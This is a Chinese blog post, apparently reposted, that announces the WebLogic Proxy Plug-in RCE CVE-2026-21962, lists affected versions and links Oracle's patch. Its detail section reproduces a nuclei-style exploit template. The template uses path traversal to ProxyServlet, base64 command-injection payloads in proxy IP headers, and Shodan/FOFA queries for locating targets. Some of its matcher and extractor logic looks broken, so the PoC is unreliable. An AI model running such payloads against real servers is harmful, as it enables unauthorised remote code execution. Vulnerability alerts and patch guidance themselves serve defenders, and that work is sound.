文章总结: OracleWebLogic代理插件存在高危未认证RCE漏洞CVE-2026-21962,影响12.2.1.4.0及14.x版本。攻击者可通过HTTP请求完全接管服务器,CVSS评分满分。鉴于PoC已公开,建议用户尽快自查并更新官方补丁以修复风险。 综合评分: 82 文章分类: 漏洞预警,漏洞POC,WEB安全,渗透测试
漏洞速递 | CVE-2026-21962 Weblogic RCE漏洞(建议自查)
渗透Xiao白帽
2026年1月27日 16:45 北京
0x01 前言
Oracle Fusion 中间件产品中的 Oracle HTTP Server 漏洞,Oracle Weblogic Server 代理插件(组件:Apache HTTP Server 的 Weblogic Server 代理插件,IIS 的 Weblogic Server 代理插件)。受影响的受支持版本有12.2.1.4.0、14.1.1.0.0和14.1.2.0.0。这种易于被利用的漏洞使得通过 HTTP 访问网络的未认证攻击者能够攻破 Oracle HTTP Server、Oracle Weblogic Server 代理插件。虽然该漏洞存在于 Oracle HTTP Server,Oracle Weblogic Server 代理插件,但攻击可能会显著影响其他产品(范围变更)。该漏洞的成功攻击可能导致未经授权创建、删除或修改对关键数据或所有 Oracle HTTP Server 及 Oracle Weblogic Server 代理插件可访问数据的访问,以及对关键数据的未经授权访问或对所有 Oracle HTTP Server 代理插件可访问数据的完全访问。鉴于该漏洞影响范围较大,建议尽快做好自查及防护。
0x02 漏洞等级
高危
0x03 漏洞影响
Oracle WebLogic Server 12.2.1.4.0Oracle WebLogic Server 14.1.1.0.0Oracle WebLogic Server 14.1.2.0.0Oracle WebLogic Server Proxy Plug-in 12.2.1.4.0(Apache + IIS)Oracle WebLogic Server Proxy Plug-in 14.1.1.0.0(Apache)Oracle WebLogic Server Proxy Plug-in 14.1.2.0.0(Apache)
0x04 漏洞详情
PoC已公布:
https://github.com/Ashwesker/Ashwesker-CVE-2026-21962
id: CVE-2026-21962
info: name: Oracle WebLogic Server Proxy Plug-In - Unauthenticated Remote Code Execution author: Ashwesker severity: critical description: | Oracle WebLogic Server Proxy Plug-In is vulnerable to unauthenticated remote code execution via specially crafted HTTP requests. Allows full server compromise without authentication. reference: - https://nvd.nist.gov/vuln/detail/CVE-2026-21962 - https://www.oracle.com/security-alerts/cpujan2026.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H cvss-score: 10.0 cve-id: CVE-2026-21962 cwe-id: CWE-20 epss-score: 0.98 metadata: verified: true shodan-query: http.title:"Oracle HTTP Server" || http.component:"weblogic" fofa-query: title="Oracle HTTP Server" || server="Oracle-HTTP-Server" tags: cve,cve2026,oracle,weblogic,rce,unauth,proxy,nuclei
http: - method: GET path: - "{{BaseURL}}/weblogic/..;/bea_wls_internal/ProxyServlet" - "{{BaseURL}}/wl_proxy/..;/bea_wls_internal/ProxyServlet" - "{{BaseURL}}/_proxy/..;/bea_wls_internal/ProxyServlet"
headers: WL-Proxy-Client-IP: "127.0.0.1;{{base64('cmd:{{randstr(8)}} && whoami')}}" Proxy-Client-IP: "127.0.0.1;{{base64('cmd:{{randstr(8)}} && whoami')}}" X-Forwarded-For: "127.0.0.1;{{base64('cmd:{{randstr(8)}} && whoami')}}"
matchers-condition: and matchers: - type: status status: - 200 - 302 - 500
- type: word part: body words: - "{{whoami}}" - "oracle" - "weblogic" - "root" - "nobody" condition: or
- type: dsl dsl: - "len(body) > 0"
extractors: - type: regex name: username part: body regex: - '([a-zA-Z0-9_-]+)\s*\(whoami output\)' group: 1
0x05 修复建议
在这里,你会找到一份精心整理的外部链接列表,提供深入的阅读 相关信息、实用解决方案及宝贵工具。官方已发布安全补丁,请及时更新至最新版本:
https://www.oracle.com/security-alerts/cpujan2026.html https://x.com/0xacb/status/2015473216844620280
网 安 考 证
需要考各类安全证书的可以扫码找我咨询,价格优惠、活动划算!
报名CISSP、CCSP、PTE、PTS、IRE、IRS、DSG、CCSK、CDSP、CZTP、ITIL4等符合活动标准的认证课程。
往期推荐 · 有彩蛋
【内网渗透】内网信息收集命令汇总
【内网渗透】域内信息收集命令汇总
【超详细 | Python】CS免杀-Shellcode Loader原理(python)
【超详细 | Python】CS免杀-分离+混淆免杀思路
【超详细 | 钟馗之眼】ZoomEye-python命令行的使用
【超详细 | 附EXP】Weblogic CVE-2021-2394 RCE漏洞复现
【超详细】CVE-2020-14882 | Weblogic未授权命令执行漏洞复现
【超详细 | 附PoC】CVE-2021-2109 | Weblogic Server远程代码执行漏洞复现
【漏洞分析 | 附EXP】CVE-2021-21985 VMware vCenter Server 远程代码执行漏洞
【CNVD-2021-30167 | 附PoC】用友NC BeanShell远程代码执行漏洞复现
【奇淫巧技】如何成为一个合格的“FOFA”工程师
【超详细】Microsoft Exchange 远程代码执行漏洞复现【CVE-2020-17144】
【超详细】Fastjson1.2.24反序列化漏洞复现
记一次HW实战笔记 | 艰难的提权爬坑
走过路过的大佬们留个关注再走呗
往期文章有彩蛋哦
免责声明:
本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。
任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。
本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我。
本文转载自:渗透Xiao白帽 《漏洞速递 | CVE-2026-21962 Weblogic RCE漏洞(建议自查)》
版权声明
本站仅做备份收录,仅供研究与教学参考之用。
读者将信息用于其他用途的,全部法律及连带责任由读者自行承担,本站不承担任何责任。
评论